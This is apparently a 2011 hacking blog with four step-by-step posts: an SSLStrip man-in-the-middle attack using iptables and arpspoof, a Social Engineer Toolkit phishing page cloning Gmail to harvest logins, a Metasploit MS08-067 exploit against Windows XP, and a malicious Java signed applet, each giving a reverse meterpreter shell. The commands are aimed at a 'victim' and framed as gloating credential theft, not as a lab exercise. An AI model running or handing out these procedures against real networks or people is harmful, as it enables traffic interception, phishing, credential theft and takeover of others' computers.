Saturday, 24 December 2011

man in the middle attack using ssl strip


SSL STRIP

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements
 For SSL SLRIP(in BACKTRACK 5 )
  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)

Setup

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

step 1 : open Terminal and type

echo "1" > /proc/sys/net/ipv4/ip_forward

this command use for Flip your machine into forwarding mode


step 2 : now u need Setup iptables to redirect HTTP traffic to sslstrip so this command use for it

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

this command is use for all traffic on 80 port is redirect to port number 7777


step 3 : now time to run sslstrip

path - /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <txt file name >

in my case

sslstrip.py -l 7777 -w mitm


-w command - write all date in one txt file 



step 4 :  Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network


Run arpspoof to convince a network they should send their traffic to you


arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case 

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1


IN VICTIM machine

IF u r blind successfull command than  u r victim pc ip table is changed by arpspoof

so u r sniff victim's data.

when victim access his/her gmail account

so his/her open gmail site but this gmail site is not real
but it is look like real site .
one one difference - real gamil site is HTTPS but this is HTTP .

When  ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.

in my case

txt file name - mitm.txt


You got ur victim facebook Credential..:D

                                                      - - - - - VIDEO TUTORIAL - - - - -

If you have any questions, Feel free to ask.
:D


Related post : 


Posted by at No comments:
Labels: ,

Wednesday, 21 December 2011

Social Engineer Toolkit (SET)-Credential Harvester Attack(hack gmail,facebook,twitter account)


SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.

Requirements

1. Bactrack 5

Social Engineer Toolkit (SET)-Credential Harvester Attack 

step 1 : 1st open terminal and go to this following path


cd  /pentext/exploit/set

and than enter

and type ./set for open  Social Engineer Toolkit

IT's look like






step 2 : Select option 1 : Social-Engineering Attacks from the set toolkit menu

now in set toolkit the new menu is open




step 3 : Select option 2 : Website Attack Vectors

The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.

now in set toolkit the new menu is open




step 4 : Select option 3 : Credential Harvester Attack Method

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

now in set toolkit the new menu is open




step 5 : Select option 2 : Site cloner

now in set toolkit the new menu is open


step 6 : Now u enter  ur target URL which u want clone ex. https://gmail.com

than enter.


Now
Credential Harvester is runing on port 80
A attacker PC is ready for attack .

now an URL you should give to your victim http://<u r ip address>/

in my case

  
http://192.168.1.103/


IN VICTIM PC

When u r victim enter this url http://192.168.1.103/ . web browser open gmail website but this is fake site made by SET toolkit..




When  ur victim enter his/her gmail Credential in this fake website , than fake website send Credential to attacker PC..








You got ur victim gmail Credential..:D

                                                      - - - - - VIDEO TUTORIAL - - - - -


If u want to learn How to use Credential Harvester Attack over the internet than click here(Youtube Video with HD print)

If you have any questions, Feel free to ask.
:D 


Related post : 
Posted by at No comments:
Labels: ,

Tuesday, 20 December 2011

How to hack windows xp (sp1,sp2,sp3) using metasploit

In this article I will be showing you how to use Ms08_067_Netapi exploit in an Unpatched windows xp to gain access to the machine. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption", This exploits helps bypassing NX on various operating systems and service packs, Before we jump into the actual exploitation process, i would suggest you taking some time looking at the exploit code here.

Requirements

1. Bactrack 5 
2. Windows XP 

How to hack windows xp using metasploit


Step 1 - First of all turn on your Backtrack 5 virtual machine .

Step 2 - Next on your console type "msfconsole", This will load the metasploit framework.

 Step 3 - Next type "use windows/smb/ms08_067_netapi" in the console.

 Step 4 - Now after the exploit has been setup, you would need to enter the RHOST, RHOST refers to the iP address of the victim. You can get the windows host iP by issuing the "ipconfig" command in the command prompt.

 Step 5 - Once the exploit is setup, it's time to setup a payload, In this case we will use a windows/meterpreter/reverse_tcp command in the shell, Next you need to set the proper lhost <attacker ip address> by issuing the command "lhost <iP address>".

  Step 6 - Next issue the command "show options" to check to see if every thing is setup fine.



Step 7 - Once you are done with the assessment, just type "exploit" in the console


If u r blind successfully exploit than u r got meterpreter shell in u r backtrack pc



                                                   - - - - - VIDEO TUTORIAL - - - - -


If you have any questions, Feel free to ask.
:D

Related post : 
Posted by at No comments:
Labels:

Tuesday, 13 December 2011

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)


Hack windows 7
Requirement : 

1.Metasploit Framework
2.Operating System(I'm recommend using Linux OS or Backtrack 5)

Step By Step :

1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can't find it, try to update your Metasploit Framework to newer version with msfupdate command. If the exploit was available, let's continue with picture below.


use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine

2.we need to add some required switches to make an attack successful.but if you want to view available switches, you can type show options.



set srvhost 192.168.1.103 ---> host that served the exploit
set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering via website
set uripath / ---> the URL format to send to victim (http://192.168.1.103) set lhost 192.168.1.103 ---> connect back address when successfully perform attack set lport 443 ---> port used to connect back to our machine
set LHOST 192.168.1.103 ----> host that served the exploit for payload


3.exploit

now an URL you should give to your victim http://192.168.1.103/

4.When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

5. After victim open the malicious URL and click RUN

Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.

Now u r got meterpreter shell in u r backtrack PC



                                                  - - - - - VIDEO TUTORIAL - - - - -



Related post : 
Posted by at 1 comment:
Labels:
Subscribe to: Comments (Atom)